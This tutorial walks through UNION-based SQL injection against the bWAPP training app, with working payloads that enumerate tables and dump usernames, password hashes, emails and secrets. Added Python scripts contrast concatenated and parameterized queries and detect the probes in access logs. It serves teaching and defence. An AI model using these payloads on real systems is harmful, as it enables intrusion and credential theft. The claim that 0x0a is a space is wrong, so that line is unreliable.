In this tutorial I'll show how SQL injection works and how to use it to extract information from the database.
The UNION operator is used in SQL injections to join a query, purposely forged by the tester, to the original query. The result of the forged query will be joined to the result of the original query, allowing the tester to obtain the values of columns of other tables.
For this tutorial we'll use the bWAPP vulnerable application.
Start the bee-box and check its IP address (open a terminal and type "ifconfig"); in my case it is 192.168.1.10. Now open your browser and connect to the bee-box address. Log in and choose SQL Injection (GET/Search).
CHECK IF IT IS VULNERABLE
To check whether the search form is vulnerable, we first need an existing film; I found hulk.
Now we type hulk' and, as you can see, we get an error. That means the form is vulnerable.
DETERMINE THE NUMBER OF COLUMNS
To determine the number of columns we use ORDER BY n, incrementing n until we get an error.
When we type hulk' order by 8# we get an error, so we know there are 7 columns.
FIND THE VULNERABLE COLUMNS
To find the vulnerable columns we use a UNION SELECT. We type hulk' union select 1,2,3,4,5,6,7# and some numbers appear on the page: 2, 3, 5, 4. These are the vulnerable columns.
CHECKING THE MYSQL VERSION
To check the MySQL version we use the @@version system variable, replacing one vulnerable column number with it: hulk' union select 1,@@version,3,4,5,6,7#. We get 5.0.96-0ubuntu3.
GET THE TABLES
To get the tables we insert: hulk' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()#. We get 5 tables: blog, heroes, movies, users, visitors.
GET THE COLUMNS
An interesting table is users. We extract the columns of this table:
hulk' union select 1,group_concat(column_name, 0x0a),3,4,5,6,7 from information_schema.columns where table_name="users"# (0x0a is a space in hexadecimal)
EXTRACT THE DATA
Finally we can extract the data: login, password, email, secret.
hulk' union select 1,login,password,email,secret,6,7 from users#
For a cleaner display we put each field in a different column.
As you can see, the password is hashed (SHA-1). We can look it up here: hashtoolkit.
The password is: bug.
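The Python script below is an added example, not part of the original tutorial or of bWAPP. It rebuilds the vulnerable pattern behind the search form (the search term concatenated into the SQL text) beside a parameterized version, and runs the ORDER BY probe and the final UNION payload from the steps above against both. An in-memory SQLite database with constructed movies and users rows stands in for bWAPP's MySQL database; the column names, the sample rows and the stored SHA-1 of "bug" are assumptions, and because SQLite ends a line comment with -- rather than MySQL's #, the payloads end with -- here.

```python
import hashlib
import sqlite3

# Constructed stand-ins for bWAPP's movies (7 columns, as found above) and users
# tables; the column names and rows are assumptions. The stored password is the
# SHA-1 of "bug", the value recovered in the tutorial.
PASSWORD_HASH = hashlib.sha1(b"bug").hexdigest()
MOVIES = [
    (1, "The Incredible Hulk", 2008, "action", "Hulk", "7.0", 50),
    (2, "Iron Man", 2008, "action", "Iron Man", "7.9", 30),
]
USERS = [("bee", PASSWORD_HASH, "bee@example.com", "constructed secret")]

# Payloads from the tutorial, with SQLite's "--" comment replacing MySQL's "#".
ORDER_BY_PROBE = "hulk' ORDER BY 8-- "
UNION_PAYLOAD = "hulk' UNION SELECT 1,login,password,email,secret,6,7 FROM users-- "


def open_demo_db():
    """Create the in-memory database holding the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE movies(id INTEGER, title TEXT, release_year INTEGER,
                            genre TEXT, main_character TEXT, imdb TEXT,
                            tickets_stock INTEGER);
        CREATE TABLE users(login TEXT, password TEXT, email TEXT, secret TEXT);
    """)
    con.executemany("INSERT INTO movies VALUES (?,?,?,?,?,?,?)", MOVIES)
    con.executemany("INSERT INTO users VALUES (?,?,?,?)", USERS)
    return con


def search_vulnerable(con, title):
    """Vulnerable pattern: the search term is spliced into the SQL text, so a
    quote in the input closes the string literal and the rest is parsed as SQL."""
    sql = "SELECT * FROM movies WHERE title LIKE '%" + title + "%'"
    return con.execute(sql).fetchall()


def search_safe(con, title):
    """Hardened pattern: the term is bound as a parameter and is never parsed
    as SQL, whatever characters it contains."""
    sql = "SELECT * FROM movies WHERE title LIKE ?"
    return con.execute(sql, ("%" + title + "%",)).fetchall()


def run_payload(search, con, payload):
    """Return ("error", message) or ("rows", rows) for one search function."""
    try:
        return "rows", search(con, payload)
    except sqlite3.OperationalError as exc:
        return "error", str(exc)


def leaked_logins(rows):
    """Column 2 holds the title for genuine rows; a users.login value there
    means a row was smuggled into the result through the UNION."""
    logins = {u[0] for u in USERS}
    return [r[1] for r in rows if r[1] in logins]


def demo():
    """Run both payloads against both implementations and summarise."""
    con = open_demo_db()
    out = {}
    out["vuln_orderby"], out["vuln_orderby_detail"] = run_payload(
        search_vulnerable, con, ORDER_BY_PROBE)
    kind, rows = run_payload(search_safe, con, ORDER_BY_PROBE)
    out["safe_orderby"], out["safe_orderby_rows"] = kind, len(rows)
    kind, rows = run_payload(search_vulnerable, con, UNION_PAYLOAD)
    out["vuln_union_leaked"] = leaked_logins(rows) if kind == "rows" else []
    out["vuln_union_hash_leaked"] = kind == "rows" and any(PASSWORD_HASH in r for r in rows)
    kind, rows = run_payload(search_safe, con, UNION_PAYLOAD)
    out["safe_union_rows"] = len(rows)
    out["safe_normal_rows"] = len(search_safe(con, "hulk"))  # a legitimate search still works
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Against the concatenating function the ORDER BY probe raises an out-of-range error (the same signal used in step two) and the UNION payload returns a users row merged into the film results, password hash included. The parameterized function treats the whole payload as a title to search for and returns no rows, while a plain search for hulk still finds the film, which is why binding parameters rather than filtering keywords is the fix.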
Obviously there are tools that do this automatically, such as sqlmap; this example is meant to show how those tools work.
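Because every probe in this technique travels in the query string, the whole sequence is visible on the server side in the web access log. The Python script below is an added example, not part of the original tutorial or of bWAPP: it parses constructed Apache-style access log lines (client addresses, timestamps and the /bWAPP/search.php path are assumptions), URL-decodes each parameter and flags the stages described above (ORDER BY probing, UNION SELECT, @@version, information_schema, a trailing comment terminator), then counts flagged requests per client address.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache-style access log lines (client IPs, timestamps and the
# /bWAPP/search.php path are assumptions). Lines 2-4 carry URL-encoded forms of
# the probes used in the tutorial; lines 1 and 5 are ordinary searches.
LOG_LINES = [
    '192.168.1.20 - - [10/May/2015:14:02:11 +0200] "GET /bWAPP/search.php?title=hulk&action=search HTTP/1.1" 200 4120',
    '192.168.1.20 - - [10/May/2015:14:02:35 +0200] "GET /bWAPP/search.php?title=hulk%27+order+by+8%23&action=search HTTP/1.1" 200 3988',
    '192.168.1.20 - - [10/May/2015:14:03:02 +0200] "GET /bWAPP/search.php?title=hulk%27+union+select+1%2C%40%40version%2C3%2C4%2C5%2C6%2C7%23&action=search HTTP/1.1" 200 4201',
    '192.168.1.20 - - [10/May/2015:14:03:40 +0200] "GET /bWAPP/search.php?title=hulk%27+union+select+1%2Cgroup_concat%28table_name%29%2C3%2C4%2C5%2C6%2C7+from+information_schema.tables+where+table_schema%3Ddatabase%28%29%23&action=search HTTP/1.1" 200 4330',
    '192.168.1.30 - - [10/May/2015:14:05:12 +0200] "GET /bWAPP/search.php?title=iron+man&action=search HTTP/1.1" 200 4077',
]

# Common log format: ip ident user [timestamp] "METHOD target PROTO" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Each signature names one stage of the UNION-based technique described above.
# They run on the *decoded* parameter values, so percent- and plus-encoding
# do not hide the keywords.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\b", re.I),
    "version_fingerprint": re.compile(r"@@version|\bversion\(\)", re.I),
    "comment_terminator": re.compile(r"(?:#|--)\s*$"),
}


def analyse_line(line):
    """Parse one access log line; return its source IP, timestamp, status and
    the signatures matched by any decoded query parameter, or None when the
    line is not a well-formed request."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    hits = set()
    for _name, value in parse_qsl(query, keep_blank_values=True):
        for sig, rx in SIGNATURES.items():
            if rx.search(value):
                hits.add(sig)
    return {"ip": m.group("ip"), "ts": m.group("ts"),
            "status": int(m.group("status")), "hits": sorted(hits)}


def flag_suspicious(lines):
    """Return the parsed records whose parameters matched at least one signature."""
    return [rec for rec in map(analyse_line, lines) if rec and rec["hits"]]


def hits_by_ip(lines):
    """Count flagged requests per client address: one hit may be noise, a
    climbing count from a single address within minutes is a scan."""
    counts = {}
    for rec in flag_suspicious(lines):
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for rec in flag_suspicious(LOG_LINES):
        print(rec["ts"], rec["ip"], ", ".join(rec["hits"]))
    print(hits_by_ip(LOG_LINES))
```

Keyword matching alone produces false positives (a film title containing "union" or "order by" would match), so the two signals worth alerting on are several signatures in one request and a rising per-address count; the 200 status on every line is also a reminder that the application answered the error-producing probe as a normal page, so the status code is not a usable indicator here.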